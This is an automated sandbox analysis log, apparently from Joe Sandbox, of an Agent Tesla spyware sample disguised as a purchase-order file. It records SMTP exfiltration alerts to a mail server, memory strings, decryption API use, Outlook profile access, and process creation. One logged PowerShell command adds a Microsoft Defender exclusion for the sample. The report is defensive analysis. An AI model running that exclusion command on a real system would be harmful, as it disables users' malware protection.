                        Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: LPO-2024-357.exe, 00000004.00000002.2923605654.000000000287A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: LPO-2024-357.exe, 00000000.00000002.1690208458.0000000002B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B0C820 NtUnmapViewOfSection,0_2_07B0C820
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B0C818 NtUnmapViewOfSection,0_2_07B0C818
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_0103DF740_2_0103DF74
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_076421F00_2_076421F0
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07641F3C0_2_07641F3C
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_0764CDE70_2_0764CDE7
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_0764CDE80_2_0764CDE8
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B027180_2_07B02718
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B02C400_2_07B02C40
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B0270B0_2_07B0270B
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B0B7580_2_07B0B758
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B096E80_2_07B096E8
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B0C1580_2_07B0C158
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B000060_2_07B00006
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B000400_2_07B00040
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B09F580_2_07B09F58
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B02D160_2_07B02D16
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B02C330_2_07B02C33
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B09B200_2_07B09B20
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_09110EB40_2_09110EB4
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_0911F1580_2_0911F158
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_0911F1470_2_0911F147
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_0911F3F00_2_0911F3F0
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00D741404_2_00D74140
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00D74D584_2_00D74D58
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00D744884_2_00D74488
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_05ED3D9C4_2_05ED3D9C
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_05ED8E084_2_05ED8E08
                        Source: LPO-2024-357.exe, 00000000.00000002.1700975172.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000000.1656640584.00000000007F0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehtrC.exeN vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1684821524.0000000000D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1690208458.0000000002B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1694260808.0000000003B01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1690208458.0000000002B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000000.00000002.1701671447.0000000009210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000004.00000002.2921447380.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LPO-2024-357.exe
                        Source: LPO-2024-357.exe, 00000004.00000002.2921731470.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs LPO-2024-357.exe
                        Source: LPO-2024-357.exeBinary or memory string: OriginalFilenamehtrC.exeN vs LPO-2024-357.exe
                        Source: LPO-2024-357.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: LPO-2024-357.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, o90pySpvXwWvR2PmHy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, ReVixo9FXbxWPDnqBj.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, ReVixo9FXbxWPDnqBj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, ReVixo9FXbxWPDnqBj.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, o90pySpvXwWvR2PmHy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, ReVixo9FXbxWPDnqBj.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, ReVixo9FXbxWPDnqBj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, ReVixo9FXbxWPDnqBj.csSecurity API names: _0020.AddAccessRule
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/1
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LPO-2024-357.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3do5jaz2.mem.ps1Jump to behavior
                        Source: LPO-2024-357.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: LPO-2024-357.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: LPO-2024-357.exeReversingLabs: Detection: 63%
                        Source: unknownProcess created: C:\Users\user\Desktop\LPO-2024-357.exe "C:\Users\user\Desktop\LPO-2024-357.exe"
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Users\user\Desktop\LPO-2024-357.exe "C:\Users\user\Desktop\LPO-2024-357.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess created: C:\Users\user\Desktop\LPO-2024-357.exe "C:\Users\user\Desktop\LPO-2024-357.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: LPO-2024-357.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: LPO-2024-357.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: LPO-2024-357.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: htrC.pdb source: LPO-2024-357.exe
                        Source: Binary string: htrC.pdbSHA256V<2 source: LPO-2024-357.exe

                        Data Obfuscation
